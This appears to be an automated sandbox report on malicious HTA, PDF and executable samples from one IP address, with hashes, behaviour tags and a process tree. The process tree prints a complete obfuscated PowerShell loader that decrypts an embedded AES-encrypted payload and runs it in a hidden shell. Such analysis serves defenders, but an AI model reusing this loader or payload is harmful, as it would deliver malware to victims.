Overview
overview
10Static
static
10163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r2.pdf
windows7-x64
3163.5.169....r2.pdf
windows10-2004-x64
3163.5.169....r3.hta
windows7-x64
8163.5.169....r3.hta
windows10-2004-x64
8163.5.169....r3.pdf
windows7-x64
3163.5.169....r3.pdf
windows10-2004-x64
3163.5.169....r4.hta
windows7-x64
8163.5.169....r4.hta
windows10-2004-x64
8163.5.169....r4.pdf
windows7-x64
3163.5.169....r4.pdf
windows10-2004-x64
3163.5.169....r5.hta
windows7-x64
8163.5.169....r5.hta
windows10-2004-x64
8163.5.169....r5.pdf
windows7-x64
3163.5.169....r5.pdf
windows10-2004-x64
3163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....er.hta
windows7-x64
8163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169.28/cmd.exe
windows10-2004-x64
1163.5.169.28/cmt.exe
windows7-x64
3163.5.169.28/cmt.exe
windows10-2004-x64
3163.5.169.28/fd1.exe
windows7-x64
10163.5.169.28/fd1.exe
windows10-2004-x64
10163.5.169....er.hta
windows7-x64
8163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
8163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r4.hta
windows7-x64
8Resubmissions
21-01-2025 13:39
250121-qx27kswrck 1021-01-2025 11:57
250121-n4kvrsskfv 1021-01-2025 11:43
250121-nvpglaslfq 1021-01-2025 11:26
250121-njtbea1qcp 10Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 11:26
Behavioral task
behavioral1
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
163.5.169.28/ato_letter2.hta
Resource
win7-20240729-en
Behavioral task
behavioral18
Sample
163.5.169.28/ato_letter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
163.5.169.28/atoletter.hta
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
163.5.169.28/atoletter.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
163.5.169.28/atoletter2.hta
Resource
win7-20240729-en
Behavioral task
behavioral22
Sample
163.5.169.28/atoletter2.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
163.5.169.28/cmd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
163.5.169.28/cmt.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
163.5.169.28/cmt.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
163.5.169.28/fd1.exe
Resource
win7-20240903-en
Behavioral task
behavioral27
Sample
163.5.169.28/fd1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
163.5.169.28/letter.hta
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
163.5.169.28/letter.hta
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
163.5.169.28/letter2.hta
Resource
win7-20241010-en
Behavioral task
behavioral31
Sample
163.5.169.28/letter2.hta
Resource
win10v2004-20241007-en
General
-
Target
163.5.169.28/letter4.hta
-
Size
1.1MB
-
MD5
4faa006670aeb4acdc9bc979a6d7cfa8
-
SHA1
e9766a98e5c721b6f5f291ac2a0360f3e6aa483f
-
SHA256
711f4c0c6e9d5433f7d658e6c7a6d40e73347f08afc5285af1f099e7333e5933
-
SHA512
bcb1ac0b92359cee60650e1e630f33098fa8034582844e05d0d86e36010ada984bd21bd8cc75b59844bf5d847778257b9e0de1095cc2b0c54d02f0faeca94ed5
-
SSDEEP
1536:/QE0zRmrv9m662wDcNzCYWKt3umr/l1vcmafSIm+lIWFjPP2txVUtEMAamHlvNKJ:4Eprv9m66DezR3K
Malware Config
Signatures
-
pid Process 2784 powershell.exe 2452 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2452 powershell.exe 2452 powershell.exe 2452 powershell.exe 2476 powershell.exe 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1272 wrote to memory of 2452 1272 mshta.exe 30 PID 1272 wrote to memory of 2452 1272 mshta.exe 30 PID 1272 wrote to memory of 2452 1272 mshta.exe 30 PID 1272 wrote to memory of 2452 1272 mshta.exe 30 PID 2452 wrote to memory of 2508 2452 powershell.exe 32 PID 2452 wrote to memory of 2508 2452 powershell.exe 32 PID 2452 wrote to memory of 2508 2452 powershell.exe 32 PID 2452 wrote to memory of 2508 2452 powershell.exe 32 PID 2508 wrote to memory of 2784 2508 cmd.exe 34 PID 2508 wrote to memory of 2784 2508 cmd.exe 34 PID 2508 wrote to memory of 2784 2508 cmd.exe 34 PID 2508 wrote to memory of 2784 2508 cmd.exe 34 PID 2508 wrote to memory of 2476 2508 cmd.exe 35 PID 2508 wrote to memory of 2476 2508 cmd.exe 35 PID 2508 wrote to memory of 2476 2508 cmd.exe 35 PID 2508 wrote to memory of 2476 2508 cmd.exe 35
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\letter4.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $XUVQK = 'AAAAAAAAAAAAAAAAAAAAACdNL48o48Hgk9rRcp6W2sCMFnSYiOhmyRPptxpXvX8i5dX53Ny/gHXnFtYWA2f50x7eQJN9zfaVym86a3cSYyV0H/cG1d6f0+5jQIdKs2lQg9TnPHJ/FXe5xA7YgsOWcs1KzAkddSZJqXMUeNIoRq7l80FAGXtfXn18nKedfR+4PIHk/IFfjPs2sClqITh00E0XYf18xFPM/XFTDM86wYPrUYE/kZdQ/0N0pl+mn17lajAkom4+RFmtDK8rjW1XeCCnCjLk/gAe1VsV7T8/4tTh78L8loLFSun03NSFXND8ow8SKHIGcPJA1p1l50jZcJtv/zyg3vgBh+2XSTFSuDUk51K2oPhiRbebsARirsunFjkFULB+wtmwBdgsQa7zVbgRHP4QUwvrfpZvF6FA5P0sbPhwruvP/MQ0FrO/FDxxqNZZz71nuZjoTCBMpgxI/tH4l4odKD56F2kM88zjrBKKxwUfiuGy8VUw8vomeQi1jCOb7Zy6AAwjqeW49iIavx54u8x9lvXIkbR4PZ5hOiiAmFEmjSIAsfl3PyOc4DtTJPPf8pBX28bBIo7K6eQVyuY5M8V9E8bx0v9Zq5Ek56QSjo7msZC9v6HkhiU5WZYEki8bqpUFTaU7dir3+jedVt81HPwqRrPeaFwpsclKEo4hCjJCcL4YJ94Gm/lXf0ozhriOvdKxOxt5caW/8B74XD4NEDqg/9EHMq8SU7EqFpu0xBnoTXD+JsVNJ64X3pyVliyWG8d4CPS8kTrHjpJGvQDhaPBLAk03vHhNDriqjtBQNE8adtvXF7GzDzg9yMxqkevbNhK0qYw4dg7xnzna5BwU3lSBD2UbP4FVc/LWWBOTiAeB50OG22Wv2peQzS80S0N8aFOlVyqkoIan/y46zD+s08qrYPS0fyoTXE8Qx1CanodkUbHS5pKXIrhZmvt806bqjmSKQC3Xpfe4ywkiWVDYUe85DyHJRoNP/Mq9uLPa7G2hWHRRuZlua0hCqMP6N9R8DKT4bpXUHdRJ8Bze0g==';$XKUhju = 'TWxEU0RheUxtaHFtUHZSWkp3QXpGb05Ea2p3S1VienM=';$gFBxoG = New-Object 'System.Security.Cryptography.AesManaged';$gFBxoG.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gFBxoG.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gFBxoG.BlockSize = 128;$gFBxoG.KeySize = 256;$gFBxoG.Key = [System.Convert]::FromBase64String($XKUhju);$QZbBy = [System.Convert]::FromBase64String($XUVQK);$OMfLzbUQ = $QZbBy[0..15];$gFBxoG.IV = $OMfLzbUQ;$aukKEQozf = $gFBxoG.CreateDecryptor();$MjXyOGXoj = $aukKEQozf.TransformFinalBlock($QZbBy, 16, $QZbBy.Length - 16);$gFBxoG.Dispose();$OVmXt = New-Object System.IO.MemoryStream( , $MjXyOGXoj );$AAjdaJc = New-Object System.IO.MemoryStream;$EXEKFdeJK = New-Object System.IO.Compression.GzipStream $OVmXt, ([IO.Compression.CompressionMode]::Decompress);$EXEKFdeJK.CopyTo( $AAjdaJc );$EXEKFdeJK.Close();$OVmXt.Close();[byte[]] $TGgZoN = $AAjdaJc.ToArray();$QHAGIWQ = [System.Text.Encoding]::UTF8.GetString($TGgZoN);$QHAGIWQ | powershell - }2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $XUVQK = 'AAAAAAAAAAAAAAAAAAAAACdNL48o48Hgk9rRcp6W2sCMFnSYiOhmyRPptxpXvX8i5dX53Ny/gHXnFtYWA2f50x7eQJN9zfaVym86a3cSYyV0H/cG1d6f0+5jQIdKs2lQg9TnPHJ/FXe5xA7YgsOWcs1KzAkddSZJqXMUeNIoRq7l80FAGXtfXn18nKedfR+4PIHk/IFfjPs2sClqITh00E0XYf18xFPM/XFTDM86wYPrUYE/kZdQ/0N0pl+mn17lajAkom4+RFmtDK8rjW1XeCCnCjLk/gAe1VsV7T8/4tTh78L8loLFSun03NSFXND8ow8SKHIGcPJA1p1l50jZcJtv/zyg3vgBh+2XSTFSuDUk51K2oPhiRbebsARirsunFjkFULB+wtmwBdgsQa7zVbgRHP4QUwvrfpZvF6FA5P0sbPhwruvP/MQ0FrO/FDxxqNZZz71nuZjoTCBMpgxI/tH4l4odKD56F2kM88zjrBKKxwUfiuGy8VUw8vomeQi1jCOb7Zy6AAwjqeW49iIavx54u8x9lvXIkbR4PZ5hOiiAmFEmjSIAsfl3PyOc4DtTJPPf8pBX28bBIo7K6eQVyuY5M8V9E8bx0v9Zq5Ek56QSjo7msZC9v6HkhiU5WZYEki8bqpUFTaU7dir3+jedVt81HPwqRrPeaFwpsclKEo4hCjJCcL4YJ94Gm/lXf0ozhriOvdKxOxt5caW/8B74XD4NEDqg/9EHMq8SU7EqFpu0xBnoTXD+JsVNJ64X3pyVliyWG8d4CPS8kTrHjpJGvQDhaPBLAk03vHhNDriqjtBQNE8adtvXF7GzDzg9yMxqkevbNhK0qYw4dg7xnzna5BwU3lSBD2UbP4FVc/LWWBOTiAeB50OG22Wv2peQzS80S0N8aFOlVyqkoIan/y46zD+s08qrYPS0fyoTXE8Qx1CanodkUbHS5pKXIrhZmvt806bqjmSKQC3Xpfe4ywkiWVDYUe85DyHJRoNP/Mq9uLPa7G2hWHRRuZlua0hCqMP6N9R8DKT4bpXUHdRJ8Bze0g==';$XKUhju = 'TWxEU0RheUxtaHFtUHZSWkp3QXpGb05Ea2p3S1VienM=';$gFBxoG = New-Object 'System.Security.Cryptography.AesManaged';$gFBxoG.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gFBxoG.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gFBxoG.BlockSize = 128;$gFBxoG.KeySize = 256;$gFBxoG.Key = [System.Convert]::FromBase64String($XKUhju);$QZbBy = [System.Convert]::FromBase64String($XUVQK);$OMfLzbUQ = $QZbBy[0..15];$gFBxoG.IV = $OMfLzbUQ;$aukKEQozf = $gFBxoG.CreateDecryptor();$MjXyOGXoj = $aukKEQozf.TransformFinalBlock($QZbBy, 16, $QZbBy.Length - 16);$gFBxoG.Dispose();$OVmXt = New-Object System.IO.MemoryStream( , $MjXyOGXoj );$AAjdaJc = New-Object System.IO.MemoryStream;$EXEKFdeJK = New-Object System.IO.Compression.GzipStream $OVmXt, ([IO.Compression.CompressionMode]::Decompress);$EXEKFdeJK.CopyTo( $AAjdaJc );$EXEKFdeJK.Close();$OVmXt.Close();[byte[]] $TGgZoN = $AAjdaJc.ToArray();$QHAGIWQ = [System.Text.Encoding]::UTF8.GetString($TGgZoN);$QHAGIWQ | powershell -3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $XUVQK = 'AAAAAAAAAAAAAAAAAAAAACdNL48o48Hgk9rRcp6W2sCMFnSYiOhmyRPptxpXvX8i5dX53Ny/gHXnFtYWA2f50x7eQJN9zfaVym86a3cSYyV0H/cG1d6f0+5jQIdKs2lQg9TnPHJ/FXe5xA7YgsOWcs1KzAkddSZJqXMUeNIoRq7l80FAGXtfXn18nKedfR+4PIHk/IFfjPs2sClqITh00E0XYf18xFPM/XFTDM86wYPrUYE/kZdQ/0N0pl+mn17lajAkom4+RFmtDK8rjW1XeCCnCjLk/gAe1VsV7T8/4tTh78L8loLFSun03NSFXND8ow8SKHIGcPJA1p1l50jZcJtv/zyg3vgBh+2XSTFSuDUk51K2oPhiRbebsARirsunFjkFULB+wtmwBdgsQa7zVbgRHP4QUwvrfpZvF6FA5P0sbPhwruvP/MQ0FrO/FDxxqNZZz71nuZjoTCBMpgxI/tH4l4odKD56F2kM88zjrBKKxwUfiuGy8VUw8vomeQi1jCOb7Zy6AAwjqeW49iIavx54u8x9lvXIkbR4PZ5hOiiAmFEmjSIAsfl3PyOc4DtTJPPf8pBX28bBIo7K6eQVyuY5M8V9E8bx0v9Zq5Ek56QSjo7msZC9v6HkhiU5WZYEki8bqpUFTaU7dir3+jedVt81HPwqRrPeaFwpsclKEo4hCjJCcL4YJ94Gm/lXf0ozhriOvdKxOxt5caW/8B74XD4NEDqg/9EHMq8SU7EqFpu0xBnoTXD+JsVNJ64X3pyVliyWG8d4CPS8kTrHjpJGvQDhaPBLAk03vHhNDriqjtBQNE8adtvXF7GzDzg9yMxqkevbNhK0qYw4dg7xnzna5BwU3lSBD2UbP4FVc/LWWBOTiAeB50OG22Wv2peQzS80S0N8aFOlVyqkoIan/y46zD+s08qrYPS0fyoTXE8Qx1CanodkUbHS5pKXIrhZmvt806bqjmSKQC3Xpfe4ywkiWVDYUe85DyHJRoNP/Mq9uLPa7G2hWHRRuZlua0hCqMP6N9R8DKT4bpXUHdRJ8Bze0g==';$XKUhju = 'TWxEU0RheUxtaHFtUHZSWkp3QXpGb05Ea2p3S1VienM=';$gFBxoG = New-Object 'System.Security.Cryptography.AesManaged';$gFBxoG.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gFBxoG.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gFBxoG.BlockSize = 128;$gFBxoG.KeySize = 256;$gFBxoG.Key = [System.Convert]::FromBase64String($XKUhju);$QZbBy = [System.Convert]::FromBase64String($XUVQK);$OMfLzbUQ = $QZbBy[0..15];$gFBxoG.IV = $OMfLzbUQ;$aukKEQozf = $gFBxoG.CreateDecryptor();$MjXyOGXoj = $aukKEQozf.TransformFinalBlock($QZbBy, 16, $QZbBy.Length - 16);$gFBxoG.Dispose();$OVmXt = New-Object System.IO.MemoryStream( , $MjXyOGXoj );$AAjdaJc = New-Object System.IO.MemoryStream;$EXEKFdeJK = New-Object System.IO.Compression.GzipStream $OVmXt, ([IO.Compression.CompressionMode]::Decompress);$EXEKFdeJK.CopyTo( $AAjdaJc );$EXEKFdeJK.Close();$OVmXt.Close();[byte[]] $TGgZoN = $AAjdaJc.ToArray();$QHAGIWQ = [System.Text.Encoding]::UTF8.GetString($TGgZoN);$QHAGIWQ4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QN9FKAKMY5WGAI3F5BAU.temp
Filesize7KB
MD5286b0793465785dd4d7909434025982d
SHA14f3bf914467d6ce48c38d7afa64af42ff969d7ed
SHA25609922cd1aaa5006e8ad953aacaf79d2bb5b9325131ecfd62c9cef127a5bd6966
SHA5120f2b0d6e9357826751f928e313fb994ef21589114cfaa6f2f53f03de15e7ef324a29f9b98644f808af37de4579284c5ea258ef20596e6078d55d260381bd12f1